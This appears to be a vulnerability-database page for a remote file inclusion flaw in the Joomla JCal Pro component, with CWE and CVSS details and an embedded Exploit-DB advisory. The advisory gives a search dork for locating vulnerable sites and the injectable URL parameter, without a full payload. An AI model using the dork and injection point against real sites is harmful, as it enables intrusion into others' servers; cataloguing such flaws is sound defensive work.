Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 10587
Publication date : 2009-12-12 23h00 +00:00
Author : kaMtiEz
EDB Verified : No
#############################################################################################################
##
## Author : kaMtiEz
[email protected]) ##
## ##Homepage:http://www.indonesiancoder.com ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.anything-digital.com
[+] version : 1.5.3.6 Stable or upper / lower maybe also affected
[+] Dork : inurl:"com_jcalpro"
#############################################################################################################
[ Vulnerable File ]
http://server/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[INDONESIANCODER]
[ BUG ]
cal_popup.php
[ FIX ]
tanya aurakasih mungkin dia tauh :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Babe enyak adek i love u pull dah ..
[+] Setelah Bertapa kagak jelas ampe pagi sama Om Don Tukuesto ... dan lagi lagi akhirnya nemu lobang :D
[+] iseng2 berhadiah bugs .. omegod >.<
[+] capek juga dari surabaya .. fyuh .,.
[ QUOTE ]
[+] one day .. u will be mind .. >.<
[+] AURAKASIH u are so .. hha
Products Mentioned
Configuraton 0
Joomla>>Joomla\! >> Version *
Anything-digital>>Com_jcalpro >> Version 1.5.3.6
References